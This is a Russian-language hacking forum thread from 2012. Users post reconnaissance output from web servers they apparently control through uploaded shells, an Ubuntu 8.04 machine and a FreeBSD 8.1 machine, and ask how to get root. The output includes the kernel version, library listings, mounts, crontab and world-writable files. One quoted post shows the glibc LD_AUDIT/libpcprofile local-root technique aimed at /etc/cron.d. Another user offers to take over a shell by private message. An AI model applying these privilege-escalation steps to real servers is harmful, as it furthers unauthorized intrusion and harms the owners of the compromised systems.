Пробовал звязку эксплойтов из первого поста. Результата нет - старые сплойты. Нового ничего к данной версии ядра не нашел. Какие могут быть пути?

$ uname -a

Code:

Linux temperate 2.6.24-29-server #1 SMP Tue Oct 11 15:57:27 UTC 2011 x86_64 GNU/ Linux

$ ls -la /boot

Code:

total 127608
drwxr-xr-x  3 root root    4096 Oct 28 15:47 .
drwxr-xr-x 22 root root    4096 Apr 15  2011 ..
-rw-r--r--  1 root root 1162307 Aug 20  2008 System.map-2.6.24-19-server
-rw-r--r--  1 root root 1163963 Sep 18  2009 System.map-2.6.24-24-server
-rw-r--r--  1 root root 1164250 Oct 20  2009 System.map-2.6.24-25-server
-rw-r--r--  1 root root 1164292 Dec  1  2009 System.map-2.6.24-26-server
-rw-r--r--  1 root root 1164686 Mar 24  2010 System.map-2.6.24-27-server
-rw-r--r--  1 root root 1165041 Feb 11  2011 System.map-2.6.24-28-server
-rw-r--r--  1 root root 1165699 Oct 11 12:19 System.map-2.6.24-29-server
-rw-r--r--  1 root root  420224 Aug 20  2008 abi-2.6.24-19-server
-rw-r--r--  1 root root  420395 Sep 18  2009 abi-2.6.24-24-server
-rw-r--r--  1 root root  420395 Oct 20  2009 abi-2.6.24-25-server
-rw-r--r--  1 root root  420457 Dec  1  2009 abi-2.6.24-26-server
-rw-r--r--  1 root root  420505 Mar 24  2010 abi-2.6.24-27-server
-rw-r--r--  1 root root  420589 Feb 11  2011 abi-2.6.24-28-server
-rw-r--r--  1 root root  420763 Oct 11 12:19 abi-2.6.24-29-server
-rw-r--r--  1 root root   74169 Aug 20  2008 config-2.6.24-19-server
-rw-r--r--  1 root root   74171 Sep 18  2009 config-2.6.24-24-server
-rw-r--r--  1 root root   74233 Oct 20  2009 config-2.6.24-25-server
-rw-r--r--  1 root root   74233 Dec  1  2009 config-2.6.24-26-server
-rw-r--r--  1 root root   74233 Mar 24  2010 config-2.6.24-27-server
-rw-r--r--  1 root root   74233 Feb 11  2011 config-2.6.24-28-server
-rw-r--r--  1 root root   74233 Oct 11 12:19 config-2.6.24-29-server
drwxr-xr-x  2 root root    4096 Oct 28 15:47 grub
-rw-r--r--  1 root root 7518293 May 26  2009 initrd.img-2.6.24-19-server
-rw-r--r--  1 root root 7242672 May 26  2009 initrd.img-2.6.24-19-server.bak
-rw-r--r--  1 root root 7521575 Oct  9  2009 initrd.img-2.6.24-24-server
-rw-r--r--  1 root root 7520450 May 26  2009 initrd.img-2.6.24-24-server.bak
-rw-r--r--  1 root root 7522317 Dec  4  2009 initrd.img-2.6.24-25-server
-rw-r--r--  1 root root 7522361 Dec  4  2009 initrd.img-2.6.24-25-server.bak
-rw-r--r--  1 root root 7522961 Jan 22  2010 initrd.img-2.6.24-26-server
-rw-r--r--  1 root root 7522493 Dec 16  2009 initrd.img-2.6.24-26-server.bak
-rw-r--r--  1 root root 7522609 May  7  2010 initrd.img-2.6.24-27-server
-rw-r--r--  1 root root 7522173 Feb 12  2010 initrd.img-2.6.24-27-server.bak
-rw-r--r--  1 root root 7523831 Mar  4  2011 initrd.img-2.6.24-28-server
-rw-r--r--  1 root root 7523657 Jun 25  2010 initrd.img-2.6.24-28-server.bak
-rw-r--r--  1 root root 7522069 Oct 28 15:47 initrd.img-2.6.24-29-server
-rw-r--r--  1 root root 7523027 Oct  7 14:50 initrd.img-2.6.24-29-server.bak
-rw-r--r--  1 root root  103204 Sep 28  2007 memtest86+.bin
-rw-r--r--  1 root root 1928152 Aug 20  2008 vmlinuz-2.6.24-19-server
-rw-r--r--  1 root root 1932632 Sep 18  2009 vmlinuz-2.6.24-24-server
-rw-r--r--  1 root root 1933304 Oct 20  2009 vmlinuz-2.6.24-25-server
-rw-r--r--  1 root root 1933240 Dec  1  2009 vmlinuz-2.6.24-26-server
-rw-r--r--  1 root root 1933304 Mar 24  2010 vmlinuz-2.6.24-27-server
-rw-r--r--  1 root root 1934360 Feb 11  2011 vmlinuz-2.6.24-28-server
-rw-r--r--  1 root root 1934392 Oct 11 12:19 vmlinuz-2.6.24-29-server

$ ls -la --full-time /lib/lib*

Code:

-rw-r--r-- 1 root root    6184 2011-01-10 23:43:26.000000000 -0700 /lib/libBroke
nLocale-2.7.so
lrwxrwxrwx 1 root root      22 2011-02-11 15:18:30.000000000 -0700 /lib/libBroke
nLocale.so.1 -> libBrokenLocale-2.7.so
-rw-r--r-- 1 root root   18608 2011-01-10 23:43:26.000000000 -0700 /lib/libSegFa
ult.so
lrwxrwxrwx 1 root root      15 2009-05-26 12:26:48.000000000 -0600 /lib/libacl.s
o.1 -> libacl.so.1.1.0
-rw-r--r-- 1 root root   27600 2007-11-14 04:46:41.000000000 -0700 /lib/libacl.s
o.1.1.0
-rw-r--r-- 1 root root   14832 2011-01-10 23:43:26.000000000 -0700 /lib/libanl-2
.7.so
lrwxrwxrwx 1 root root      13 2011-02-11 15:18:30.000000000 -0700 /lib/libanl.s
o.1 -> libanl-2.7.so
lrwxrwxrwx 1 root root      15 2009-05-26 12:27:04.000000000 -0600 /lib/libatm.s
o.1 -> libatm.so.1.0.0
-rw-r--r-- 1 root root   36328 2007-08-14 15:50:24.000000000 -0600 /lib/libatm.s
o.1.0.0
lrwxrwxrwx 1 root root      16 2009-05-26 12:26:48.000000000 -0600 /lib/libattr.
so.1 -> libattr.so.1.1.0
-rw-r--r-- 1 root root   16128 2007-10-31 17:25:39.000000000 -0600 /lib/libattr.
so.1.1.0
lrwxrwxrwx 1 root root      15 2009-05-26 12:26:49.000000000 -0600 /lib/libblkid
.so.1 -> libblkid.so.1.0
-rw-r--r-- 1 root root   45456 2008-03-27 11:25:26.000000000 -0600 /lib/libblkid
.so.1.0
lrwxrwxrwx 1 root root      15 2010-10-08 13:04:09.000000000 -0600 /lib/libbz2.s
o.1 -> libbz2.so.1.0.4
lrwxrwxrwx 1 root root      15 2010-10-08 13:04:09.000000000 -0600 /lib/libbz2.s
o.1.0 -> libbz2.so.1.0.4
-rw-r--r-- 1 root root   64816 2010-09-10 15:11:51.000000000 -0600 /lib/libbz2.s
o.1.0.4
-rwxr-xr-x 1 root root 1436976 2011-01-10 23:43:26.000000000 -0700 /lib/libc-2.7
.so
lrwxrwxrwx 1 root root      11 2011-02-11 15:18:30.000000000 -0700 /lib/libc.so.
6 -> libc-2.7.so
lrwxrwxrwx 1 root root      14 2009-05-26 12:27:04.000000000 -0600 /lib/libcap.s
o.1 -> libcap.so.1.10
-rw-r--r-- 1 root root   15080 2007-07-31 13:27:39.000000000 -0600 /lib/libcap.s
o.1.10
lrwxrwxrwx 1 root root      17 2009-05-26 12:27:03.000000000 -0600 /lib/libcfont
.so.0 -> libcfont.so.0.0.0
-rw-r--r-- 1 root root   13720 2008-02-06 15:50:00.000000000 -0700 /lib/libcfont
.so.0.0.0
-rw-r--r-- 1 root root  190768 2011-01-10 23:43:26.000000000 -0700 /lib/libcidn-
2.7.so
lrwxrwxrwx 1 root root      14 2011-02-11 15:18:30.000000000 -0700 /lib/libcidn.
so.1 -> libcidn-2.7.so
lrwxrwxrwx 1 root root      17 2009-05-26 12:26:49.000000000 -0600 /lib/libcom_e
rr.so.2 -> libcom_err.so.2.1
-rw-r--r-- 1 root root   10104 2008-03-27 11:25:26.000000000 -0600 /lib/libcom_e
rr.so.2.1
lrwxrwxrwx 1 root root      19 2009-05-26 12:27:03.000000000 -0600 /lib/libconso
le.so.0 -> libconsole.so.0.0.0
-rw-r--r-- 1 root root  140976 2008-02-06 15:50:00.000000000 -0700 /lib/libconso
le.so.0.0.0
-rw-r--r-- 1 root root   39120 2011-01-10 23:43:26.000000000 -0700 /lib/libcrypt
-2.7.so
lrwxrwxrwx 1 root root      15 2011-02-11 15:18:30.000000000 -0700 /lib/libcrypt
.so.1 -> libcrypt-2.7.so
lrwxrwxrwx 1 root root      19 2009-05-26 12:27:03.000000000 -0600 /lib/libctuti
ls.so.0 -> libctutils.so.0.0.0
-rw-r--r-- 1 root root   21440 2008-02-06 15:50:00.000000000 -0700 /lib/libctuti
ls.so.0.0.0
-rw-r--r-- 1 root root   94752 2007-12-12 13:09:39.000000000 -0700 /lib/libdevma
pper.so.1.02.1
-rw-r--r-- 1 root root   14624 2011-01-10 23:43:26.000000000 -0700 /lib/libdl-2.
7.so
lrwxrwxrwx 1 root root      12 2011-02-11 15:18:30.000000000 -0700 /lib/libdl.so
.2 -> libdl-2.7.so
lrwxrwxrwx 1 root root      13 2009-05-26 12:26:49.000000000 -0600 /lib/libe2p.s
o.2 -> libe2p.so.2.3
-rw-r--r-- 1 root root   24400 2008-03-27 11:25:26.000000000 -0600 /lib/libe2p.s
o.2.3
lrwxrwxrwx 1 root root      16 2009-05-26 12:26:49.000000000 -0600 /lib/libext2f
s.so.2 -> libext2fs.so.2.4
-rw-r--r-- 1 root root  164984 2008-03-27 11:25:26.000000000 -0600 /lib/libext2f
s.so.2.4
lrwxrwxrwx 1 root root      16 2011-03-04 15:15:35.000000000 -0700 /lib/libfuse.
so.2 -> libfuse.so.2.7.2
-rw-r--r-- 1 root root  128752 2011-02-11 13:43:42.000000000 -0700 /lib/libfuse.
so.2.7.2
-rw-r--r-- 1 root root   56072 2009-02-20 05:37:50.000000000 -0700 /lib/libgcc_s
.so.1
lrwxrwxrwx 1 root root      19 2009-05-26 12:27:04.000000000 -0600 /lib/libgcryp
t.so.11 -> libgcrypt.so.11.2.3
-rw-r--r-- 1 root root  318608 2007-12-07 05:17:38.000000000 -0700 /lib/libgcryp
t.so.11.2.3
lrwxrwxrwx 1 root root      21 2009-05-26 12:27:04.000000000 -0600 /lib/libgpg-e
rror.so.0 -> libgpg-error.so.0.3.0
-rw-r--r-- 1 root root   13144 2007-11-15 17:53:55.000000000 -0700 /lib/libgpg-e
rror.so.0.3.0
lrwxrwxrwx 1 root root      17 2009-05-26 12:27:04.000000000 -0600 /lib/libhisto
ry.so.5 -> libhistory.so.5.2
-rw-r--r-- 1 root root   32504 2007-10-02 09:05:33.000000000 -0600 /lib/libhisto
ry.so.5.2
-rw-r--r-- 1 root root   32120 2007-12-21 08:02:34.000000000 -0700 /lib/libiw.so
.29
-rw-r--r-- 1 root root    7344 2007-10-23 21:17:56.000000000 -0600 /lib/libkeyut
ils-1.2.so
lrwxrwxrwx 1 root root      18 2009-05-26 12:27:03.000000000 -0600 /lib/libkeyut
ils.so.1 -> libkeyutils-1.2.so
-rw-r--r-- 1 root root  526560 2011-01-10 23:43:26.000000000 -0700 /lib/libm-2.7
.so
lrwxrwxrwx 1 root root      11 2011-02-11 15:18:30.000000000 -0700 /lib/libm.so.
6 -> libm-2.7.so
-rw-r--r-- 1 root root   14504 2011-01-10 23:43:26.000000000 -0700 /lib/libmemus
age.so
lrwxrwxrwx 1 root root      17 2009-05-26 12:26:49.000000000 -0600 /lib/libncurs
es.so.5 -> libncurses.so.5.6
-rw-r--r-- 1 root root  241408 2008-02-23 16:39:14.000000000 -0700 /lib/libncurs
es.so.5.6
lrwxrwxrwx 1 root root      18 2009-05-26 12:27:04.000000000 -0600 /lib/libncurs
esw.so.5 -> libncursesw.so.5.6
-rw-r--r-- 1 root root  290432 2008-02-23 16:39:15.000000000 -0700 /lib/libncurs
esw.so.5.6
-rw-r--r-- 1 root root   93080 2011-01-10 23:43:26.000000000 -0700 /lib/libnsl-2
.7.so
lrwxrwxrwx 1 root root      13 2011-02-11 15:18:30.000000000 -0700 /lib/libnsl.s
o.1 -> libnsl-2.7.so
-rw-r--r-- 1 root root   35632 2011-01-10 23:43:26.000000000 -0700 /lib/libnss_c
ompat-2.7.so
lrwxrwxrwx 1 root root      20 2011-02-11 15:18:30.000000000 -0700 /lib/libnss_c
ompat.so.2 -> libnss_compat-2.7.so
-rw-r--r-- 1 root root   22856 2011-01-10 23:43:26.000000000 -0700 /lib/libnss_d
ns-2.7.so
lrwxrwxrwx 1 root root      17 2011-02-11 15:18:30.000000000 -0700 /lib/libnss_d
ns.so.2 -> libnss_dns-2.7.so
-rw-r--r-- 1 root root   47528 2011-01-10 23:43:26.000000000 -0700 /lib/libnss_f
iles-2.7.so
lrwxrwxrwx 1 root root      19 2011-02-11 15:18:30.000000000 -0700 /lib/libnss_f
iles.so.2 -> libnss_files-2.7.so
-rw-r--r-- 1 root root   18792 2011-01-10 23:43:26.000000000 -0700 /lib/libnss_h
esiod-2.7.so
lrwxrwxrwx 1 root root      20 2011-02-11 15:18:30.000000000 -0700 /lib/libnss_h
esiod.so.2 -> libnss_hesiod-2.7.so
-rw-r--r-- 1 root root   43480 2011-01-10 23:43:26.000000000 -0700 /lib/libnss_n
is-2.7.so
lrwxrwxrwx 1 root root      17 2011-02-11 15:18:30.000000000 -0700 /lib/libnss_n
is.so.2 -> libnss_nis-2.7.so
-rw-r--r-- 1 root root   51632 2011-01-10 23:43:26.000000000 -0700 /lib/libnss_n
isplus-2.7.so
lrwxrwxrwx 1 root root      21 2011-02-11 15:18:30.000000000 -0700 /lib/libnss_n
isplus.so.2 -> libnss_nisplus-2.7.so
lrwxrwxrwx 1 root root      20 2009-05-26 13:03:46.000000000 -0600 /lib/libntfs-
3g.so.23 -> libntfs-3g.so.23.0.0
-rw-r--r-- 1 root root  168232 2008-07-10 04:19:06.000000000 -0600 /lib/libntfs-
3g.so.23.0.0
lrwxrwxrwx 1 root root      16 2011-10-28 15:46:58.000000000 -0600 /lib/libpam.s
o.0 -> libpam.so.0.81.6
-rw-r--r-- 1 root root   42928 2011-10-18 09:38:55.000000000 -0600 /lib/libpam.s
o.0.81.6
lrwxrwxrwx 1 root root      21 2011-10-28 15:46:58.000000000 -0600 /lib/libpam_m
isc.so.0 -> libpam_misc.so.0.81.2
-rw-r--r-- 1 root root   11056 2011-10-18 09:38:55.000000000 -0600 /lib/libpam_m
isc.so.0.81.2
lrwxrwxrwx 1 root root      17 2011-10-28 15:46:58.000000000 -0600 /lib/libpamc.
so.0 -> libpamc.so.0.81.0
-rw-r--r-- 1 root root   11648 2011-10-18 09:38:55.000000000 -0600 /lib/libpamc.
so.0.81.0
lrwxrwxrwx 1 root root      22 2009-07-17 12:41:51.000000000 -0600 /lib/libparte
d-1.7.so.1 -> libparted-1.7.so.1.0.0
-rw-r--r-- 1 root root  377304 2009-06-05 03:43:36.000000000 -0600 /lib/libparte
d-1.7.so.1.0.0
-rw-r--r-- 1 root root    6200 2011-01-10 23:43:26.000000000 -0700 /lib/libpcpro
file.so
lrwxrwxrwx 1 root root      16 2009-05-26 12:27:04.000000000 -0600 /lib/libpopt.
so.0 -> libpopt.so.0.0.0
-rw-r--r-- 1 root root   31992 2007-03-07 14:58:33.000000000 -0700 /lib/libpopt.
so.0.0.0
-rw-r--r-- 1 root root   59048 2008-07-10 03:29:05.000000000 -0600 /lib/libproc-
3.2.7.so
-rwxr-xr-x 1 root root  130224 2011-01-10 23:43:31.000000000 -0700 /lib/libpthre
ad-2.7.so
lrwxrwxrwx 1 root root      17 2011-02-11 15:18:30.000000000 -0700 /lib/libpthre
ad.so.0 -> libpthread-2.7.so
lrwxrwxrwx 1 root root      18 2009-05-26 12:27:04.000000000 -0600 /lib/libreadl
ine.so.5 -> libreadline.so.5.2
-rw-r--r-- 1 root root  257016 2007-10-02 09:05:33.000000000 -0600 /lib/libreadl
ine.so.5.2
-rw-r--r-- 1 root root   80760 2011-01-10 23:43:26.000000000 -0700 /lib/libresol
v-2.7.so
lrwxrwxrwx 1 root root      16 2011-02-11 15:18:30.000000000 -0700 /lib/libresol
v.so.2 -> libresolv-2.7.so
-rw-r--r-- 1 root root   35784 2011-01-10 23:43:26.000000000 -0700 /lib/librt-2.
7.so
lrwxrwxrwx 1 root root      12 2011-02-11 15:18:30.000000000 -0700 /lib/librt.so
.1 -> librt-2.7.so
-rw-r--r-- 1 root root  109368 2008-02-29 16:03:40.000000000 -0700 /lib/libselin
ux.so.1
-rw-r--r-- 1 root root  237216 2008-02-29 22:21:48.000000000 -0700 /lib/libsepol
.so.1
lrwxrwxrwx 1 root root      17 2009-05-26 12:26:49.000000000 -0600 /lib/libslang
.so.2 -> libslang.so.2.1.3
-rw-r--r-- 1 root root  966504 2007-11-28 07:08:31.000000000 -0700 /lib/libslang
.so.2.1.3
lrwxrwxrwx 1 root root      12 2009-05-26 12:26:49.000000000 -0600 /lib/libss.so
.2 -> libss.so.2.0
-rw-r--r-- 1 root root   24440 2008-03-27 11:25:26.000000000 -0600 /lib/libss.so
.2.0
lrwxrwxrwx 1 root root      17 2009-05-26 12:27:04.000000000 -0600 /lib/libsysfs
.so.2 -> libsysfs.so.2.0.1
-rw-r--r-- 1 root root   42552 2008-04-01 11:05:56.000000000 -0600 /lib/libsysfs
.so.2.0.1
-rw-r--r-- 1 root root   31376 2011-01-10 23:43:26.000000000 -0700 /lib/libthrea
d_db-1.0.so
lrwxrwxrwx 1 root root      19 2011-02-11 15:18:30.000000000 -0700 /lib/libthrea
d_db.so.1 -> libthread_db-1.0.so
lrwxrwxrwx 1 root root      13 2009-05-26 12:26:49.000000000 -0600 /lib/libtic.s
o.5 -> libtic.so.5.6
-rw-r--r-- 1 root root   74416 2008-02-23 16:39:14.000000000 -0700 /lib/libtic.s
o.5.6
lrwxrwxrwx 1 root root      14 2009-05-26 12:27:04.000000000 -0600 /lib/libticw.
so.5 -> libticw.so.5.6
-rw-r--r-- 1 root root   74416 2008-02-23 16:39:15.000000000 -0700 /lib/libticw.
so.5.6
lrwxrwxrwx 1 root root      20 2011-03-04 15:15:35.000000000 -0700 /lib/libulock
mgr.so.1 -> libulockmgr.so.1.0.1
-rw-r--r-- 1 root root    9592 2011-02-11 13:43:42.000000000 -0700 /lib/libulock
mgr.so.1.0.1
lrwxrwxrwx 1 root root      19 2009-05-26 12:27:04.000000000 -0600 /lib/libusb-0
.1.so.4 -> libusb-0.1.so.4.4.4
-rw-r--r-- 1 root root   33128 2007-11-23 02:46:00.000000000 -0700 /lib/libusb-0
.1.so.4.4.4
-rw-r--r-- 1 root root   10584 2011-01-10 23:43:26.000000000 -0700 /lib/libutil-
2.7.so
lrwxrwxrwx 1 root root      14 2011-02-11 15:18:30.000000000 -0700 /lib/libutil.
so.1 -> libutil-2.7.so
lrwxrwxrwx 1 root root      14 2009-05-26 12:26:49.000000000 -0600 /lib/libuuid.
so.1 -> libuuid.so.1.2
-rw-r--r-- 1 root root   15368 2008-03-27 11:25:26.000000000 -0600 /lib/libuuid.
so.1.2
lrwxrwxrwx 1 root root      22 2009-05-26 13:03:46.000000000 -0600 /lib/libvolum
e_id.so.0 -> libvolume_id.so.0.81.0
-rw-r--r-- 1 root root   33784 2009-04-14 15:44:33.000000000 -0600 /lib/libvolum
e_id.so.0.81.0
lrwxrwxrwx 1 root root      16 2009-05-26 12:27:04.000000000 -0600 /lib/libwrap.
so.0 -> libwrap.so.0.7.6
-rw-r--r-- 1 root root   35984 2007-07-30 02:20:30.000000000 -0600 /lib/libwrap.
so.0.7.6

$ mount

Code:

/dev/sdb1 on / type ext3 (rw,relatime,errors=remount-ro)
proc on /proc type proc (rw,noexec,nosuid,nodev)
/sys on /sys type sysfs (rw,noexec,nosuid,nodev)
varrun on /var/run type tmpfs (rw,noexec,nosuid,nodev,mode=0755)
varlock on /var/lock type tmpfs (rw,noexec,nosuid,nodev,mode=1777)
udev on /dev type tmpfs (rw,mode=0755)
devshm on /dev/shm type tmpfs (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
securityfs on /sys/kernel/security type securityfs (rw)

$ df -h

Code:

Filesystem            Size  Used Avail Use% Mounted on
/dev/sdb1             963G   24G  892G   3% /
varrun                7.9G   44K  7.9G   1% /var/run
varlock               7.9G     0  7.9G   0% /var/lock
udev                  7.9G  108K  7.9G   1% /dev
devshm                7.9G     0  7.9G   0% /dev/shm

$ cat /etc/issue

Code:

Ubuntu 8.04.4 LTS \n \l

$ cat /etc/crontab

Code:

# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --repor
t /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --repor
t /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --repor
t /etc/cron.monthly )
#

$ cat /proc/version

Code:

Linux version 2.6.24-29-server (buildd@crested) (gcc version 4.2.4 (Ubuntu 4.2.4 -1ubuntu3)) #1 SMP Tue Oct 11 15:57:27 UTC 2011

$ cat /proc/sys/vm/mmap_min_addr

Code:

$ pwd

Code:

/export/www/htdocs/sites/URL.COM/files

$ ls -la /usr/bin/staprun

Code:

ls: cannot access /usr/bin/staprun: No such file or directory

Expl0ited · 13 Jan 2012

SEO.NEWBIE, у меня идей нет.
SecondLife, у меня идей нет.

SecondLife · 13 Jan 2012

Expl0ited, а не подскажешь, почему команда $ find / -perm -2 -ls выводит огромный список файлов, которые, согласно выводу, доступны для записи? Например:

Code:

  
16007474    0 lrwxrwxrwx   1 root     root            9 Jul 13  2011 /etc/php5/cgi/conf.d -> ../conf.d
16007473    0 lrwxrwxrwx   1 root     root            9 Jul 12  2011 /etc/php5/apache2/conf.d -> ../conf.d
16007475    0 lrwxrwxrwx   1 root     root            9 Jul 13  2011 /etc/php5/cli/conf.d -> ../conf.d
19513351    0 lrwxrwxrwx   1 root     root           20 Jul 12  2011 /bin/nc -> /etc/alternatives/nc
19513347    0 lrwxrwxrwx   1 root     root            6 Jul 12  2011 /bin/bzegrep -> bzgrep
19513354    0 lrwxrwxrwx   1 root     root            4 Jul 12  2011 /bin/rbash -> bash
19513348    0 lrwxrwxrwx   1 root     root            6 Jul 12  2011 /bin/bzfgrep -> bzgrep
19513353    0 lrwxrwxrwx   1 root     root           16 Jul 12  2011 /bin/pidof -> ../sbin/killall5
19513346    0 lrwxrwxrwx   1 root     root            6 Jul 12  2011 /bin/bzcmp -> bzdiff
19513356    0 lrwxrwxrwx   1 root     root            4 Jul 12  2011 /bin/sh -> bash
19513355    0 lrwxrwxrwx   1 root     root            4 Jul 12  2011 /bin/rnano -> nano
19513350    0 lrwxrwxrwx   1 root     root           20 Jul 12  2011 /bin/mt -> /etc/alternatives/mt
19513349    0 lrwxrwxrwx   1 root     root            6 Jul 12  2011 /bin/bzless -> bzmore
19513352    0 lrwxrwxrwx   1 root     root           24 Jul 12  2011 /bin/netcat -> /etc/alternatives/netcat
22740995    0 lrwxrwxrwx   1 root     root            7 Jul 12  2011 /sbin/ip -> /bin/ip
22741000    0 lrwxrwxrwx   1 root     root            4 Jul 12  2011 /sbin/reboot -> halt
22741004    0 lrwxrwxrwx   1 root     root            9 Jul 12  2011 /sbin/umount.nfs -> mount.nfs
22740999    0 lrwxrwxrwx   1 root     root            7 Jul 13  2011 /sbin/quotaoff -> quotaon
22741002    0 lrwxrwxrwx   1 root     root            4 Jul 12  2011 /sbin/telinit -> init
22741006    0 lrwxrwxrwx   1 root     root           16 Jul 12  2011 /sbin/vol_id -> /lib/udev/vol_id
22741121    0 lrwxrwxrwx   1 root     root            9 Sep 30 11:13 /sbin/dhclient -> dhclient3
22740996    0 lrwxrwxrwx   1 root     root           10 Jul 12  2011 /sbin/lsmod -> /bin/lsmod
22740998    0 lrwxrwxrwx   1 root     root            4 Jul 12  2011 /sbin/poweroff -> halt
22741003    0 lrwxrwxrwx   1 root     root            7 Jul 12  2011 /sbin/udevsettle -> udevadm
22740997    0 lrwxrwxrwx   1 root     root            9 Jul 12  2011 /sbin/mount.nfs4 -> mount.nfs
22741001    0 lrwxrwxrwx   1 root     root            6 Jul 12  2011 /sbin/swapoff -> swapon
22741005    0 lrwxrwxrwx   1 root     root            9 Jul 12  2011 /sbin/umount.nfs4 -> mount.nfs

в то время, как при просмотре через шелл отображается

Code:

Name: sh Size: 779.09 KB Permission: -rwxr-xr-x Owner/Group: root/root

Expl0ited · 13 Jan 2012

SecondLife said:
Expl0ited, а не подскажешь, почему команда $ find / -perm -2 -ls выводит огромный список файлов, которые, согласно выводу, доступны для записи? Например:
Code:
  
16007474    0 lrwxrwxrwx   1 root     root            9 Jul 13  2011 /etc/php5/cgi/conf.d -> ../conf.d
16007473    0 lrwxrwxrwx   1 root     root            9 Jul 12  2011 /etc/php5/apache2/conf.d -> ../conf.d
16007475    0 lrwxrwxrwx   1 root     root            9 Jul 13  2011 /etc/php5/cli/conf.d -> ../conf.d
19513351    0 lrwxrwxrwx   1 root     root           20 Jul 12  2011 /bin/nc -> /etc/alternatives/nc
19513347    0 lrwxrwxrwx   1 root     root            6 Jul 12  2011 /bin/bzegrep -> bzgrep
19513354    0 lrwxrwxrwx   1 root     root            4 Jul 12  2011 /bin/rbash -> bash
19513348    0 lrwxrwxrwx   1 root     root            6 Jul 12  2011 /bin/bzfgrep -> bzgrep
19513353    0 lrwxrwxrwx   1 root     root           16 Jul 12  2011 /bin/pidof -> ../sbin/killall5
19513346    0 lrwxrwxrwx   1 root     root            6 Jul 12  2011 /bin/bzcmp -> bzdiff
19513356    0 lrwxrwxrwx   1 root     root            4 Jul 12  2011 /bin/sh -> bash
19513355    0 lrwxrwxrwx   1 root     root            4 Jul 12  2011 /bin/rnano -> nano
19513350    0 lrwxrwxrwx   1 root     root           20 Jul 12  2011 /bin/mt -> /etc/alternatives/mt
19513349    0 lrwxrwxrwx   1 root     root            6 Jul 12  2011 /bin/bzless -> bzmore
19513352    0 lrwxrwxrwx   1 root     root           24 Jul 12  2011 /bin/netcat -> /etc/alternatives/netcat
22740995    0 lrwxrwxrwx   1 root     root            7 Jul 12  2011 /sbin/ip -> /bin/ip
22741000    0 lrwxrwxrwx   1 root     root            4 Jul 12  2011 /sbin/reboot -> halt
22741004    0 lrwxrwxrwx   1 root     root            9 Jul 12  2011 /sbin/umount.nfs -> mount.nfs
22740999    0 lrwxrwxrwx   1 root     root            7 Jul 13  2011 /sbin/quotaoff -> quotaon
22741002    0 lrwxrwxrwx   1 root     root            4 Jul 12  2011 /sbin/telinit -> init
22741006    0 lrwxrwxrwx   1 root     root           16 Jul 12  2011 /sbin/vol_id -> /lib/udev/vol_id
22741121    0 lrwxrwxrwx   1 root     root            9 Sep 30 11:13 /sbin/dhclient -> dhclient3
22740996    0 lrwxrwxrwx   1 root     root           10 Jul 12  2011 /sbin/lsmod -> /bin/lsmod
22740998    0 lrwxrwxrwx   1 root     root            4 Jul 12  2011 /sbin/poweroff -> halt
22741003    0 lrwxrwxrwx   1 root     root            7 Jul 12  2011 /sbin/udevsettle -> udevadm
22740997    0 lrwxrwxrwx   1 root     root            9 Jul 12  2011 /sbin/mount.nfs4 -> mount.nfs
22741001    0 lrwxrwxrwx   1 root     root            6 Jul 12  2011 /sbin/swapoff -> swapon
22741005    0 lrwxrwxrwx   1 root     root            9 Jul 12  2011 /sbin/umount.nfs4 -> mount.nfs
в то время, как при просмотре через шелл отображается
Code:
Name: sh Size: 779.09 KB Permission: -rwxr-xr-x Owner/Group: root/root
Click to expand...
Это симлинки

gl0w said:

sh-3.1$ umask 0

sh-3.1$ dpkg -S /lib/libpcprofile.so
libc6: /lib/libpcprofile.so

sh-3.1$ ls -l /lib/libpcprofile.so
-rw-r--r-- 1 root root 5400 Jan 17 2009 /lib/libpcprofile.so

sh-3.1$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
[-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
[-M mtu discovery hint] [-S sndbuf]
[ -T timestamp option ] [ -Q tos ] [hop1 ...] destination

sh-3.1$ ls -l /etc/cron.d/exploit
ls: /etc/cron.d/exploit: No such file or directory

Так тоже не выходит, а компилировал в тот раз сам suid'ник :3
Click to expand...

Дай шелл в личку, посмотрю.

Bragal · 13 Jan 2012

Есть серв

$ uname -a

Code:

FreeBSD dect4 8.1-RELEASE FreeBSD 8.1-RELEASE #0: Mon Nov 22 18:12:20 UTC 2010     root@dect4:/usr/src/sys/i386/compile/GENERIC  i386

В каталоге /usr/local/etc/ есть врайтабельные рутовские скрипты.

$ ls -lha

Code:

total 1388
drwxr-xr-x  21 root        wheel   1.5K Jan 13 13:28 .
drwxr-xr-x  16 root        wheel   512B Oct  1 21:25 ..
-rw-r--r--   1 root        wheel    86K Dec  6 02:07 Muttrc
-r--r--r--   1 root        wheel    86K Dec  6 02:07 Muttrc.dist
drwxr-xr-x   5 root        wheel   512B Apr 21  2011 apache22
drwxr-xr-x   2 root        wheel   512B Apr 15  2011 bash_completion.d
drwxr-xr-x   2 root        wheel   512B Nov 17  2010 devd
drwxr-xr-x   4 root        wheel   512B Nov 24  2010 fonts
-r--r--r--   1 root        wheel   487B Apr 15  2011 gdk_pixbufConf.sh
-r--r--r--   1 root        wheel   400B Apr 15  2011 gdk_pixbuf_xlibConf.sh
drwxr-xr-x   4 root        wheel   512B Jan  5  2011 lighttpd
drwxr-xr-x   2 root        wheel   512B Nov 17  2010 man.d
drwxr-xr-x   2 root        wheel   512B Apr 18  2011 mc
-r--r--r--   1 root        wheel    23K Dec  6 02:07 mime.types
drwxr-xr-x   2 root        wheel   512B Nov 19  2010 mrtg
drwxr-xr-x   6 root        wheel   512B Dec  6 14:10 munin
-r--r--r--   1 root        wheel   2.1K Jan 12 11:42 my.cnf
-r--r--r--   1 root        wheel   1.9K Aug 30 19:25 my.cnf.last
-rwxrwxrwx   1 root        wheel    41B Nov 21  2010 my.sh
